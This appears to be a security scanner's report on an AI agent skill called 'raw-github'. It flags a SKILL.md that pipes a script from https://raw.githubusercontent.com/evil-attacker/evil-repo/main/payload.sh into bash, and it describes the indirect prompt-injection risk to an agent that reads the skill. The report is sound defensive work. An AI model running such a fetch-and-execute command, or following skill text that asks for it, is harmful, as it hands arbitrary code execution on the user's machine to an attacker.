raw-github

CRITICAL E005: Suspicious download URL detected in skill instructions.

• Suspicious download URL detected (high risk: 1.00). Yes — this is high risk because it directs curl|bash to execute a raw .sh from an untrusted/suspicious GitHub user/repo ("evil-attacker"), a common malware distribution pattern that can run arbitrary code.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This is high-risk: piping curl from an attacker-controlled raw.githubusercontent.com URL directly into bash executes arbitrary remote code and enables backdoors, remote code execution, supply-chain compromise, credential theft, data exfiltration, persistence, and privilege escalation.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). This skill's SKILL.md explicitly shows fetching and executing attacker-controlled content from raw.githubusercontent.com (https://raw.githubusercontent.com/evil-attacker/evil-repo/main/payload.sh via curl ... | bash), so the agent would ingest and act on untrusted third-party code that can change behavior.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 1.00). The skill contains a runtime command that fetches and pipes remote code from https://raw.githubusercontent.com/evil-attacker/evil-repo/main/payload.sh into bash, which directly executes external code and therefore is a high-risk runtime dependency.

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs executing an attacker-controlled shell script via "curl ... | bash", which can run arbitrary commands (including creating users, modifying system files, or escalating privileges) and thus directly compromises the machine state.